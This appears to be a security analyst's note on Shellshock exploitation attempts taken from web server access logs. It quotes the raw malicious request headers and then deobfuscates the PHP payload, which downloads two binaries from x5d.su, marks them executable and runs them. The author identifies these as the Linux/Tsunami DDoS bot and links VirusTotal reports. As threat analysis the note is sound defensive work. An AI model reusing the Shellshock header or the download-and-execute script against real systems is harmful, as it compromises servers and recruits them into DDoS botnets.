Shellshock exploitaton trying to download DDoS tool

1. /*
2. Example of shellshock exploitation trying to download a DDoS tool "Linux/Tsunami" from x5d.su (146.155.13.42,  Pontificia Universidad Catolica de Chile, although TLD .su is "Soviet Union" ¿?):
3. */
4.  
5. [...]
6. 188.165.247.42 - - [12/Apr/2015:23:40:37 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
7. 188.165.247.42 - - [12/Apr/2015:23:40:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
8. 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
9. 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
10. 188.165.247.42 - - [12/Apr/2015:23:40:41 +0200] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 31295 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
11. 91.217.90.49 - - [12/Apr/2015:23:41:35 +0200] "GET /rom-0 HTTP/1.0" 404 31275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
12. 27.145.148.119 - - [12/Apr/2015:23:43:47 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
13. 27.145.148.119 - - [12/Apr/2015:23:43:51 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
14. 202.29.238.196 - - [12/Apr/2015:23:43:52 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31299 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
15. 202.29.238.196 - - [12/Apr/2015:23:43:53 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
16. [...]
17.  
18. --------------
19. /*
20. Decoded script is:
21. */
22. $a = "http://x5d.su/s/susu1";
23. $b = "http://x5d.su/s/susu2";
24. $c = sys_get_temp_dir();
25. $d = "susu1";
26. $e = "susu2";
27. $f = "chmod 777";
28. $g = "file_put_contents";
29. $h = "system";
30. $i = "file_exists";
31. $j = "fopen";
32.  
33. if ($i($c . "/$d")){
34.     exit(1);
35. }else{
36.     echo($c);
37.     $g("$c/$d", $j("$a", "r"));
38.     $g("$c/$e", $j("$b", "r"));
39.     $h("$f " . $c ."/$d");
40.     $h("$f " . $c ."/$e");
41.     $h($c . "/$d");
42.     $h($c . "/$e");
43. }
44.  
45. ----------------------
46. /*
47. Translated script is:
48. */
49. if (file_exists(sys_get_temp_dir() . "/"susu1"")){
50.     exit(1);
51. }else{
52.     echo(sys_get_temp_dir());
53.     file_put_contents("sys_get_temp_dir()/susu1", fopen("http://x5d.su/s/susu1", "r"));
54.     file_put_contents("sys_get_temp_dir()/susu2", fopen("http://x5d.su/s/susu2", "r"));
55.     system("chmod 777 " . sys_get_temp_dir() ."/susu1");
56.     system("chmod 777 " . sys_get_temp_dir() ."/susu2");
57.     system(sys_get_temp_dir() . "/susu1");
58.     system(sys_get_temp_dir() . "/susu2");
59. }
60.  
61. Links to Virustotal:
62.  
63. https://www.virustotal.com/en/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/ (x64) 64b version
64. https://www.virustotal.com/en/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/ (i386) 32b version